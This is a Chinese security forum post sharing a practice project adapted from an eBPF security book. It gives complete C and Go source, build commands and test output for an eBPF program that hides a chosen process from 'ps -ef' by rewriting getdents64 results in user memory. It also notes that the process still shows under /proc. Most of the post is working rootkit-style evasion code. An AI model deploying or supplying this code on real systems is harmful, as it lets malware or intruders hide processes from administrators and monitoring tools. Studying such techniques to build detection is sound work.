[分享]基于eBPF的进程隐藏技术

发表于: 2025-1-18 19:45 3736

[分享]基于eBPF的进程隐藏技术

Jtian

2025-1-18 19:45

3736

这是一个练习项目，主要是针对《eBPF云原生安全：原理与实践》的chapter14的hide-pid的代码实践，仅修改了指定pid的小部分代码。最终实现了通过-p参数指定想要隐藏的进程号，在执行ps -ef的时候无法观察到被隐藏的进程。

实验环境

操作系统版本

Ubuntu 22.04.3 LTS
 
# uname -a
Linux Jtian 5.15.167.4-microsoft-standard-WSL2 #1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

编译环境准备

git clone https://github.com/mozillazg/cloud-native-security-with-ebpf.git
 
https://github.com/libbpf/bpftool/releases/download/v7.5.0/bpftool-v7.5.0-amd64.tar.gz
tar xvf bpftool-v7.5.0-amd64.tar.gz
cp bpftool /usr/bin
 
apt-get update
apt-get install libelf-dev
apt-get install clang
 
apt-get install golang-1.23-go
ln -s /usr/lib/go-1.23/bin/go go
go env -w GOPROXY=https://goproxy.cn,direct

hide-pid-p主要代码

参考cloud-native-security-with-ebpf/chapter14/hide-pid代码，只修改了main.go获取pid的部分代码，使得可以通过-p参数可以隐藏指定的进程。

main.bpf.c

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "main.h"
 
struct {
    __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
    __uint(key_size, sizeof(u32));
    __uint(value_size, sizeof(u32));
} events SEC(".maps");
 
struct {
    __uint(type, BPF_MAP_TYPE_LRU_HASH);
    __uint(max_entries, 2048);
    __type(key, u64);
    __type(value, long unsigned int);
} dirp_map SEC(".maps");
 
static const volatile struct config_t configs;
 
SEC("tracepoint/syscalls/sys_enter_getdents64")
int tracepoint_syscalls__sys_enter_getdents64(struct trace_event_raw_sys_enter *ctx) {
    u64 tid = bpf_get_current_pid_tgid();
 
    struct linux_dirent64 *dirp = (struct linux_dirent64 *)BPF_CORE_READ(ctx, args[1]);
 
    bpf_map_update_elem(&dirp_map, &tid, &dirp, BPF_ANY);
    return 0;
}
 
SEC("tracepoint/syscalls/sys_exit_getdents64")
int tracepoint_syscalls__sys_exit_getdents64(struct trace_event_raw_sys_exit *ctx) {
    struct event_t event = { 0 };
    u64 tid = bpf_get_current_pid_tgid();
    int total_bytes_read = BPF_CORE_READ(ctx, ret);
    if (total_bytes_read <= 0) {
        return 0;
    }
    long unsigned int *pp = bpf_map_lookup_elem(&dirp_map, &tid);
    if (!pp) {
        return 0;
    }
    char to_hide_pid[MAX_NAME];
    #pragma unroll
    for (int i = 0; i < MAX_NAME; i++) {
        to_hide_pid[i] = configs.to_hide_pid[i];
        if (to_hide_pid[i] == '\0') {
            break;
        }
    }
 
    bool overwrite = false;
    int overwrite_ret = 0;
 
    //
    struct linux_dirent64 *pre_dirent_start = (struct linux_dirent64*)*pp;
    struct linux_dirent64 *current_dirent_start;
    char current_dir[MAX_NAME] = {};
    //
    short unsigned int pre_reclen = 0;
    short unsigned int current_reclen = 0;
    short unsigned int overwrite_reclen = 0;
    int current_total = 0;
 
    #pragma unroll
    for (int i = 0; i < 1024; i++) {
        // 通过指针操作获取当前 struct linux_dirent64 实例
        current_dirent_start = (struct linux_dirent64*)((void *)pre_dirent_start + pre_reclen);
        // 读取 d_name 和 d_reclen 字段的值
        bpf_probe_read_user(&current_dir, sizeof(current_dir), (char *)current_dirent_start->d_name);
        bpf_probe_read_user(&current_reclen, sizeof(current_reclen), (void *)&current_dirent_start->d_reclen);
 
        // 如果是待隐藏 pid 的目录
        if (str_eq(current_dir, to_hide_pid, MAX_NAME)) {
            // 修改上一个示例的 reclen 字段长度，让它覆盖当前实例长度，达到跳过当前实例的目的，结果就是从 ps 结果中隐藏了该 pid
            overwrite_reclen = pre_reclen + current_reclen;
            overwrite_ret = bpf_probe_write_user(&pre_dirent_start->d_reclen, &overwrite_reclen, sizeof(overwrite_reclen));
            overwrite = true;
            break;
        }
 
        // 防止内存越界
        current_total += current_reclen;
        if (current_total >= total_bytes_read) {
            break;
        }
 
        // 处理下一个实例
        pre_reclen = current_reclen;
        pre_dirent_start = current_dirent_start;
    }
 
    if (!overwrite) {
        return 0;
    }
 
 
    event.pid = bpf_get_current_pid_tgid() >> 32;
    event.ret = overwrite_ret;
    #pragma unroll
    for (int i = 0; i < MAX_NAME; i++) {
        event.hidden_pid[i] = configs.to_hide_pid[i];
        if (event.hidden_pid[i] == '\0') {
            break;
        }
    }
    bpf_get_current_comm(&event.comm, sizeof(event.comm));
 
    bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(struct event_t));
 
    return 0;
}
 
 
char _license[] SEC("license") = "GPL";

main.go

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

package main
 
import (
    "flag"
    "bytes"
    "context"
    "encoding/binary"
    "fmt"
    "log"
    "os"
    "os/signal"
    "syscall"
 
    bpf "github.com/aquasecurity/libbpfgo"
)
 
type Event struct {
    Pid       uint32
    Ret       uint32
    HiddenPid [8]byte
    Comm      [16]byte
}
 
type Config struct {
    ToHidePid [8]byte
}
 
func parseEvent(data []byte) (*Event, error) {
    var event Event
    err := binary.Read(bytes.NewBuffer(data), binary.LittleEndian, &event)
    if err != nil {
        return nil, err
    }
    return &event, nil
}
 
func main() {
    var err error
    defer func() {
        if err != nil {
            log.Fatalf("%+v", err)
        }
    }()
 
    /*
    pid := os.Getpid()
    log.Printf("pid: %d\n", pid)
    toHidePid := [8]byte{}
    bs := []byte(fmt.Sprintf("%d", pid))
    for i, v := range bs {
        toHidePid[i] = v
    }*/
 
    var pidStr string
    flag.StringVar(&pidStr, "p", "", "进程ID")
    flag.Parse()
 
    if pidStr == "" {
        fmt.Printf("Usage: %s -p pid\n\n", os.Args[0])
        return
    }
     
    var toHidePid [8]byte
    copy(toHidePid[:], pidStr)
 
    bpfModule, err := bpf.NewModuleFromFile("main.bpf.o")
    if err != nil {
        return
    }
    defer bpfModule.Close()
 
    config := Config{ToHidePid: toHidePid}
    if err = bpfModule.InitGlobalVariable("configs", config); err != nil {
        return
    }
 
    if err = bpfModule.BPFLoadObject(); err != nil {
        return
    }
    progIter := bpfModule.Iterator()
    for {
        prog := progIter.NextProgram()
        if prog == nil {
            break
        }
        _, err = prog.AttachGeneric()
        if err != nil {
            return
        }
    }
    log.Println("tracing...")
    eventsChannel := make(chan []byte)
    lostChannel := make(chan uint64)
    pb, err := bpfModule.InitPerfBuf("events", eventsChannel, lostChannel, 1024)
    if err != nil {
        return
    }
    //log.Printf("will hide pid %d", pid)
    ctx, stop := signal.NotifyContext(context.Background(), os.Interrupt, syscall.SIGTERM)
 
    pb.Start()
    defer func() {
        pb.Stop()
        pb.Close()
        stop()
    }()
 
loop:
    for {
        select {
        case data := <-eventsChannel:
            event, e := parseEvent(data)
            if e != nil {
                err = e
                return
            } else {
                log.Printf("pid: %d, comm: %s, hidden_pid: %s ret: %d",
                    event.Pid, event.Comm, event.HiddenPid, event.Ret)
            }
        case n := <-lostChannel:
            log.Printf("lost %d events", n)
        case <-ctx.Done():
            break loop
        }
    }
    log.Println("bye bye~")
}

编译

执行make build，生成 main 和 main.bpf.o 文件。

root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# make clean
make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src clean
rm -rf ./output
rm -rf vmlinux.h
rm -rf main
rm -rf main.bpf.o main.o
make[1]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  CLEAN
make[1]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ls
Makefile  README.md  main.bpf.c  main.go  main.h
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# make build
make -C . main
make[1]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p'
mkdir -p ./output/libbpf
CC="gcc" CFLAGS="-ggdb -gdwarf -O2 -Wall -fpie -Wno-unused-variable -Wno-unused-function" LD_FLAGS="" \
   make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src \
        BUILD_STATIC_ONLY=1 \
        OBJDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf \
        DESTDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output \
        INCLUDEDIR= LIBDIR= UAPIDIR= prefix= libdir= install
make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src UAPIDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output install_uapi_headers
make[2]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  MKDIR    /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/bpf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/btf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf_errno.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/netlink.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/nlattr.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/str_error.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf_probes.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/bpf_prog_linfo.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/btf_dump.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/hashmap.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/ringbuf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/strset.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/linker.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/gen_loader.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/relo_core.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/usdt.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/zip.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/elf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/features.o
  AR       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.a
  INSTALL  bpf.h libbpf.h btf.h libbpf_common.h libbpf_legacy.h bpf_helpers.h bpf_helper_defs.h bpf_tracing.h bpf_endian.h bpf_core_read.h skel_internal.h libbpf_version.h usdt.bpf.h
  INSTALL  /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.pc
  INSTALL  /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.a
make[2]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
make[2]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  INSTALL  ../include/uapi/linux/bpf.h ../include/uapi/linux/bpf_common.h ../include/uapi/linux/btf.h
make[2]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
INFO: generating vmlinux.h from /sys/kernel/btf/vmlinux
clang -ggdb -gdwarf -O2 -Wall -fpie -Wno-unused-variable -Wno-unused-function -target bpf -D__TARGET_ARCH_x86 -I. -I./output -c main.bpf.c -o main.bpf.o
CC=clang \
        CGO_CFLAGS="-I/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output" \
        CGO_LDFLAGS="-lelf -lz /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf.a" \
        GOARCH=amd64 \
        go build \
        -tags netgo -ldflags '-w -extldflags "-static"' \
        -o main ./main.go
make[1]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p'
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ls
Makefile  README.md  main  main.bpf.c  main.bpf.o  main.go  main.h  output  vmlinux.h
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#

测试效果

随便启动一个python进程，并获得进程号pid

root@Jtian:~# python
Python 3.10.12 (main, Nov  6 2024, 20:22:13) [GCC 11.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>>

获得python的pid号为 119558

root@Jtian:~# ps -ef|grep python
root      119558    3209  0 19:27 pts/0    00:00:00 python
root      119741   90282  0 19:28 pts/2    00:00:00 grep --color=auto python
root@Jtian:~#
root@Jtian:~#

隐藏指定进程

root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ./main -p 119558
libbpf: loading main.bpf.o
libbpf: elf: section(3) tracepoint/syscalls/sys_enter_getdents64, size 176, link 0, flags 6, type=1
libbpf: sec 'tracepoint/syscalls/sys_enter_getdents64': found program 'tracepoint_syscalls__sys_enter_getdents64' at insn offset 0 (0 bytes), code size 22 insns (176 bytes)
libbpf: elf: section(4) .reltracepoint/syscalls/sys_enter_getdents64, size 16, link 30, flags 40, type=9
libbpf: elf: section(5) tracepoint/syscalls/sys_exit_getdents64, size 130472, link 0, flags 6, type=1
libbpf: sec 'tracepoint/syscalls/sys_exit_getdents64': found program 'tracepoint_syscalls__sys_exit_getdents64' at insn offset 0 (0 bytes), code size 16309 insns (130472 bytes)
libbpf: elf: section(6) .reltracepoint/syscalls/sys_exit_getdents64, size 160, link 30, flags 40, type=9
libbpf: elf: section(7) .maps, size 56, link 0, flags 3, type=1
libbpf: elf: section(8) .rodata, size 8, link 0, flags 2, type=1
libbpf: elf: section(9) license, size 4, link 0, flags 3, type=1
libbpf: license of main.bpf.o is GPL
libbpf: elf: section(20) .BTF, size 3677, link 0, flags 0, type=1
libbpf: elf: section(22) .BTF.ext, size 157068, link 0, flags 0, type=1
libbpf: elf: section(30) .symtab, size 6864, link 1, flags 0, type=2
libbpf: looking for externs among 286 symbols...
libbpf: collected 0 externs total
libbpf: map 'dirp_map': at sec_idx 7, offset 0.
libbpf: map 'dirp_map': found type = 9.
libbpf: map 'dirp_map': found key [8], sz = 8.
libbpf: map 'dirp_map': found value [12], sz = 8.
libbpf: map 'dirp_map': found max_entries = 2048.
libbpf: map 'events': at sec_idx 7, offset 32.
libbpf: map 'events': found type = 4.
libbpf: map 'events': found key_size = 4.
libbpf: map 'events': found value_size = 4.
libbpf: map 'main.rodata' (global data): at sec_idx 8, offset 0, flags 80.
libbpf: map 2 is "main.rodata"
libbpf: sec '.reltracepoint/syscalls/sys_enter_getdents64': collecting relocation for section(3) 'tracepoint/syscalls/sys_enter_getdents64'
libbpf: sec '.reltracepoint/syscalls/sys_enter_getdents64': relo #0: insn #16 against 'dirp_map'
....
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #512: patched insn #16188 (ALU/ALU64) imm 16 -> 16
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: <byte_off> [34] struct linux_dirent64.d_reclen (0:2 @ offset 16)
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: matching candidate #0 <byte_off> [36451] struct linux_dirent64.d_reclen (0:2 @ offset 16)
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: patched insn #16247 (ALU/ALU64) imm 16 -> 16
libbpf: map 'dirp_map': created successfully, fd=7
libbpf: map 'events': setting size to 32
libbpf: map 'events': created successfully, fd=8
libbpf: map 'main.rodata': created successfully, fd=9
2025/01/18 19:29:52 tracing...

观察进程隐藏效果 | 针对ps -ef有效，但针对ls -l /proc/xxx无效

针对ps -ef有效

root@Jtian:~# ps -ef|grep python
root      120545   90282  0 19:31 pts/2    00:00:00 grep --color=auto python
root@Jtian:~#

每次执行ps -ef，在进程隐藏的程序中也有打印出相应日志。

libbpf: map 'dirp_map': created successfully, fd=7
libbpf: map 'events': setting size to 32
libbpf: map 'events': created successfully, fd=8
libbpf: map 'main.rodata': created successfully, fd=9
2025/01/18 19:29:52 tracing...
2025/01/18 19:31:42 pid: 121264, comm: ps, hidden_pid: 119558 ret: 0

针对ls -l /proc/xxx无效

root@Jtian:~#
root@Jtian:~# ls -l /proc/119558
total 0
-r--r--r--  1 root root 0 Jan 18 19:37 arch_status
dr-xr-xr-x  2 root root 0 Jan 18 19:37 attr
-r--------  1 root root 0 Jan 18 19:37 auxv
-r--r--r--  1 root root 0 Jan 18 19:37 cgroup
--w-------  1 root root 0 Jan 18 19:37 clear_refs
-r--r--r--  1 root root 0 Jan 18 19:28 cmdline
-rw-r--r--  1 root root 0 Jan 18 19:37 comm
-rw-r--r--  1 root root 0 Jan 18 19:37 coredump_filter
-r--r--r--  1 root root 0 Jan 18 19:37 cpuset
lrwxrwxrwx  1 root root 0 Jan 18 19:37 cwd -> /root
-r--------  1 root root 0 Jan 18 19:37 environ
lrwxrwxrwx  1 root root 0 Jan 18 19:37 exe -> /usr/bin/python3.10
dr-x------  2 root root 0 Jan 18 19:37 fd
dr-xr-xr-x  2 root root 0 Jan 18 19:37 fdinfo
-rw-r--r--  1 root root 0 Jan 18 19:37 gid_map
-r--------  1 root root 0 Jan 18 19:37 io
-r--r--r--  1 root root 0 Jan 18 19:37 limits
-rw-r--r--  1 root root 0 Jan 18 19:37 loginuid
dr-x------  2 root root 0 Jan 18 19:37 map_files
-r--r--r--  1 root root 0 Jan 18 19:37 maps
-rw-------  1 root root 0 Jan 18 19:37 mem
-r--r--r--  1 root root 0 Jan 18 19:37 mountinfo
-r--r--r--  1 root root 0 Jan 18 19:37 mounts
-r--------  1 root root 0 Jan 18 19:37 mountstats
dr-xr-xr-x 65 root root 0 Jan 18 19:37 net
dr-x--x--x  2 root root 0 Jan 18 19:37 ns
-rw-r--r--  1 root root 0 Jan 18 19:37 oom_adj
-r--r--r--  1 root root 0 Jan 18 19:37 oom_score
-rw-r--r--  1 root root 0 Jan 18 19:37 oom_score_adj
-r--------  1 root root 0 Jan 18 19:37 pagemap
-r--------  1 root root 0 Jan 18 19:37 personality
-rw-r--r--  1 root root 0 Jan 18 19:37 projid_map
lrwxrwxrwx  1 root root 0 Jan 18 19:37 root -> /
-rw-r--r--  1 root root 0 Jan 18 19:37 sched
-r--r--r--  1 root root 0 Jan 18 19:37 schedstat
-r--r--r--  1 root root 0 Jan 18 19:37 sessionid
-rw-r--r--  1 root root 0 Jan 18 19:37 setgroups
-r--r--r--  1 root root 0 Jan 18 19:37 smaps
-r--r--r--  1 root root 0 Jan 18 19:37 smaps_rollup
-r--------  1 root root 0 Jan 18 19:37 stack
-r--r--r--  1 root root 0 Jan 18 19:28 stat
-r--r--r--  1 root root 0 Jan 18 19:37 statm
-r--r--r--  1 root root 0 Jan 18 19:28 status
-r--------  1 root root 0 Jan 18 19:37 syscall
dr-xr-xr-x  3 root root 0 Jan 18 19:37 task
-rw-r--r--  1 root root 0 Jan 18 19:37 timens_offsets
-r--r--r--  1 root root 0 Jan 18 19:37 timers
-rw-rw-rw-  1 root root 0 Jan 18 19:37 timerslack_ns
-rw-r--r--  1 root root 0 Jan 18 19:37 uid_map
-r--r--r--  1 root root 0 Jan 18 19:37 wchan
root@Jtian:~#

[培训]Windows内核深度攻防：从Hook技术到Rootkit实战！

最后于 2025-1-18 19:52 被Jtian编辑，原因：

#系统内核 #开源分享

收藏・7

免费・2

支持

最新回复 (1)
Freax 雪币： 5148 活跃值： (1736) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 38 粉丝 1 关注私信	Freax 2 楼支持android吗 2025-8-1 13:59 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Jtian

发帖

回帖

105

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (1)
Freax 雪币： 5148 活跃值： (1736) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 38 粉丝 1 关注私信	Freax 2 楼支持android吗 2025-8-1 13:59 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复